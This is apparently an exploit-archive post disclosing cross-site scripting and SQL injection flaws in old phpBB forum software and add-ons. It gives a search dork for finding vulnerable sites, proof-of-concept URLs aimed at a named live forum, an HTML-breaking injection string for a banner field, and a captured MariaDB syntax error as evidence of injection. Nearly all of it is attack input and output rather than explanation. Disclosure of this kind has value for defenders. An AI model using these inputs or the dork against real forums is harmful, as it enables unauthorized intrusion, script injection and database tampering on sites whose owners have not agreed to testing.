/$$ /$$$$$$$ /$$$$$$$ | $$ | $$__ $$| $$__ $$ /$$$$$$ | $$$$$$$ /$$$$$$ | $$ \ $$| $$ \ $$ /$$__ $$| $$__ $$ /$$__ $$| $$$$$$$ | $$$$$$$ | $$ \ $$| $$ \ $$| $$ \ $$| $$__ $$| $$__ $$ | $$ | $$| $$ | $$| $$ | $$| $$ \ $$| $$ \ $$ | $$$$$$$/| $$ | $$| $$$$$$$/| $$$$$$$/| $$$$$$$/ | $$____/ |__/ |__/| $$____/ |_______/ |_______/ phpBB © 2003 - 2008 | $$ | $$ | $$ | $$ |__/ |__/ # Exploit Title: phpBB XSS+SQLi # Date: 02/05/2023 # Exploit Author: Emiliano Febbi # Vendor Homepage: ??? # Software Link: Google # Version: phpBB © 2003 - 2008 # Tested on: Windows 10 # CMS: phpBB # Dork:/forum/cal.php?cl_d= # Vulnz: Persistent XSS + SQLi *PoC* [code] http://roxasdarkest.mastertopforum.com/cal.php?cl_d=%25&cl_m=05&cl_y=2023&mode=display <= [*XSS*] #1 ... *Toplist MOD By: WyriHaximus* <= [*Persistent XSS*] #2 /forum/toplist.php?f=toplistnew name info ------------------ ------------------- | | | ------------------ ------------------- ------------------ ------------------- | bugged | bugged | insert: https://www.google.it/'>\>"> ------------------ ------------------- URL banner #tested:http://roxasdarkest.mastertopforum.com/toplist.php?f=toplistnew ... http://roxasdarkest.mastertopforum.com/recent.php?mode=lastXdays&amount_days=4 <= [*SQLi*] #3 #error: ######################################################################################################################################################################################################################### #SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' ORDER BY t.topic_last_post_id DESC LIMIT 0, 10' at line 8 # ######################################################################################################################################################################################################################### [/code] ._________. */ ///______I ) . /_(_) /__/*PoC End*